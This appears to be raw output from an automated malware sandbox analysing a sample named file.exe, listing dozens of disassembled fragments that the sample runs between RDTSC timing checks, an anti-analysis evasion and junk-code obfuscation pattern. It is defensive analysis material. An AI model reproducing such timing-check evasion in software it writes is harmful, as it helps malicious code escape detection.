Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6913E3 second address: 6913EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6913EA second address: 691410 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5A147D6A2Ch 0x00000008 jno 00007F5A147D6A26h 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F5A147D6A2Ch 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 691410 second address: 691414 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 698A2E second address: 698A32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 698A32 second address: 698A4E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5A14B6C848h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 698A4E second address: 698A54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 698A54 second address: 698A85 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5A14B6C83Ch 0x00000007 pushad 0x00000008 jmp 00007F5A14B6C83Ch 0x0000000d jmp 00007F5A14B6C844h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 69AFBE second address: 69AFC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F5A147D6A26h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 69AFC8 second address: 69AFCE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 69AFCE second address: 69B007 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F5A147D6A36h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jnl 00007F5A147D6A36h 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 69B007 second address: 69B01E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F5A14B6C841h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 69B01E second address: 69B024 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 69B024 second address: 69B028 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 69B028 second address: 69B02C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 69B02C second address: 69B032 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6B0126 second address: 6B0133 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6B1731 second address: 6B1739 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6B1739 second address: 6B1761 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnc 00007F5A147D6A43h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6C8D4E second address: 6C8D7F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ecx 0x00000009 pushad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f jmp 00007F5A14B6C849h 0x00000014 popad 0x00000015 jo 00007F5A14B6C842h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6C91CF second address: 6C91E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007F5A147D6A2Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6C960E second address: 6C9616 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6C9616 second address: 6C961E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6C961E second address: 6C9639 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5A14B6C83Ch 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e js 00007F5A14B6C836h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6C9935 second address: 6C9939 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6CDF44 second address: 6CDF62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F5A14B6C845h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6CE117 second address: 6CE11B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6CE11B second address: 6CE134 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007F5A14B6C83Ah 0x0000000c pop eax 0x0000000d popad 0x0000000e push eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6CE134 second address: 6CE1BD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5A147D6A2Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F5A147D6A34h 0x0000000e popad 0x0000000f nop 0x00000010 push 00000000h 0x00000012 push esi 0x00000013 call 00007F5A147D6A28h 0x00000018 pop esi 0x00000019 mov dword ptr [esp+04h], esi 0x0000001d add dword ptr [esp+04h], 0000001Ch 0x00000025 inc esi 0x00000026 push esi 0x00000027 ret 0x00000028 pop esi 0x00000029 ret 0x0000002a push 00000004h 0x0000002c push 00000000h 0x0000002e push eax 0x0000002f call 00007F5A147D6A28h 0x00000034 pop eax 0x00000035 mov dword ptr [esp+04h], eax 0x00000039 add dword ptr [esp+04h], 00000019h 0x00000041 inc eax 0x00000042 push eax 0x00000043 ret 0x00000044 pop eax 0x00000045 ret 0x00000046 sub edx, dword ptr [ebp+122D2D73h] 0x0000004c call 00007F5A147D6A29h 0x00000051 push eax 0x00000052 push edx 0x00000053 push edx 0x00000054 jmp 00007F5A147D6A2Bh 0x00000059 pop edx 0x0000005a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6CE1BD second address: 6CE1DB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5A14B6C843h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6CE1DB second address: 6CE1F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 jnl 00007F5A147D6A26h 0x0000000c pop esi 0x0000000d popad 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 je 00007F5A147D6A26h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6CE1F6 second address: 6CE238 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F5A14B6C836h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F5A14B6C83Eh 0x0000000f popad 0x00000010 mov eax, dword ptr [eax] 0x00000012 jmp 00007F5A14B6C83Eh 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e jnc 00007F5A14B6C836h 0x00000024 jmp 00007F5A14B6C83Bh 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6CFA54 second address: 6CFA61 instructions: 0x00000000 rdtsc 0x00000002 js 00007F5A147D6A28h 0x00000008 push esi 0x00000009 pop esi 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50C02DC second address: 50C02E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50C02E0 second address: 50C0329 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push esp 0x00000008 pushad 0x00000009 pushfd 0x0000000a jmp 00007F5A147D6A38h 0x0000000f and si, E928h 0x00000014 jmp 00007F5A147D6A2Bh 0x00000019 popfd 0x0000001a mov bh, ch 0x0000001c popad 0x0000001d mov dword ptr [esp], ebp 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F5A147D6A2Eh 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50C0329 second address: 50C0348 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5A14B6C83Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c mov ecx, ebx 0x0000000e popad 0x0000000f pop ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 movzx ecx, dx 0x00000016 mov bh, CAh 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50C0348 second address: 50C034E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50C034E second address: 50C0352 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50C0352 second address: 50C0356 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50B00A9 second address: 50B00B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5A14B6C83Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50F05E7 second address: 50F0615 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F5A147D6A32h 0x00000008 or cl, FFFFFFA8h 0x0000000b jmp 00007F5A147D6A2Bh 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 popad 0x00000014 push eax 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50F0615 second address: 50F0619 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50F0619 second address: 50F061F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50F061F second address: 50F064A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5A14B6C83Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F5A14B6C83Eh 0x0000000f mov ebp, esp 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 movsx edx, ax 0x00000017 mov bh, ah 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50F064A second address: 50F06A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F5A147D6A2Eh 0x00000009 add ecx, 2AFDB998h 0x0000000f jmp 00007F5A147D6A2Bh 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007F5A147D6A38h 0x0000001b sbb ecx, 41D5E3F8h 0x00000021 jmp 00007F5A147D6A2Bh 0x00000026 popfd 0x00000027 popad 0x00000028 pop edx 0x00000029 pop eax 0x0000002a pop ebp 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 popad 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50F06A3 second address: 50F06A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50F06A7 second address: 50F06AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50800D6 second address: 508012D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5A14B6C842h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b push ecx 0x0000000c pushfd 0x0000000d jmp 00007F5A14B6C83Dh 0x00000012 sub ah, 00000016h 0x00000015 jmp 00007F5A14B6C841h 0x0000001a popfd 0x0000001b pop esi 0x0000001c pushad 0x0000001d mov ecx, edi 0x0000001f popad 0x00000020 popad 0x00000021 push eax 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F5A14B6C842h 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 508012D second address: 5080133 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50A0D26 second address: 50A0D42 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5A14B6C848h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50A0D42 second address: 50A0D48 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50A0D48 second address: 50A0D4C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50A0D4C second address: 50A0D6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F5A147D6A34h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50A0D6B second address: 50A0D71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50A0D71 second address: 50A0DAA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b mov ebx, 5F3115BAh 0x00000010 push eax 0x00000011 push edx 0x00000012 pushfd 0x00000013 jmp 00007F5A147D6A31h 0x00000018 or cl, 00000036h 0x0000001b jmp 00007F5A147D6A31h 0x00000020 popfd 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50A08D0 second address: 50A08D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50A08D4 second address: 50A08F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5A147D6A39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50A08F1 second address: 50A0901 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5A14B6C83Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50A0901 second address: 50A0953 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5A147D6A2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d jmp 00007F5A147D6A2Fh 0x00000012 popad 0x00000013 xchg eax, ebp 0x00000014 jmp 00007F5A147D6A35h 0x00000019 mov ebp, esp 0x0000001b jmp 00007F5A147D6A2Eh 0x00000020 pop ebp 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 mov ecx, edx 0x00000026 mov ch, dh 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50A0953 second address: 50A0959 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50A0959 second address: 50A095D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50A095D second address: 50A0961 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50A07E8 second address: 50A07EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50A07EC second address: 50A0807 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5A14B6C847h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50A0807 second address: 50A0846 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5A147D6A39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F5A147D6A2Eh 0x0000000f push eax 0x00000010 jmp 00007F5A147D6A2Bh 0x00000015 xchg eax, ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50A0846 second address: 50A084A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50A084A second address: 50A0865 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5A147D6A37h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50A0865 second address: 50A086A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50A057A second address: 50A057E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50A057E second address: 50A0582 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50A0582 second address: 50A0588 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50A0588 second address: 50A05A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5A14B6C847h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50A05A3 second address: 50A060A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5A147D6A39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d mov al, 90h 0x0000000f jmp 00007F5A147D6A39h 0x00000014 popad 0x00000015 mov ebp, esp 0x00000017 jmp 00007F5A147D6A2Eh 0x0000001c pop ebp 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F5A147D6A37h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50A060A second address: 50A0610 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50B0380 second address: 50B039C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop eax 0x00000005 call 00007F5A147D6A2Bh 0x0000000a pop eax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 mov dh, 00h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50B039C second address: 50B03A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50B03A1 second address: 50B0428 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5A147D6A2Fh 0x00000008 pushfd 0x00000009 jmp 00007F5A147D6A38h 0x0000000e sbb eax, 734482C8h 0x00000014 jmp 00007F5A147D6A2Bh 0x00000019 popfd 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d mov dword ptr [esp], ebp 0x00000020 jmp 00007F5A147D6A36h 0x00000025 mov ebp, esp 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a pushfd 0x0000002b jmp 00007F5A147D6A2Dh 0x00000030 and esi, 7A607296h 0x00000036 jmp 00007F5A147D6A31h 0x0000003b popfd 0x0000003c mov edx, ecx 0x0000003e popad 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50B0428 second address: 50B0456 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5A14B6C83Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F5A14B6C848h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50B0456 second address: 50B045A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50B045A second address: 50B0460 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50F04DA second address: 50F04DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50F04DE second address: 50F04E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50F04E4 second address: 50F04EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50F04EA second address: 50F04EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50F04EE second address: 50F050B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F5A147D6A32h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50F050B second address: 50F054B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5A14B6C83Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f pushfd 0x00000010 jmp 00007F5A14B6C841h 0x00000015 sbb eax, 46C32586h 0x0000001b jmp 00007F5A14B6C841h 0x00000020 popfd 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50F054B second address: 50F0551 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50F0551 second address: 50F0561 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50F0561 second address: 50F0565 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50F0565 second address: 50F056B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
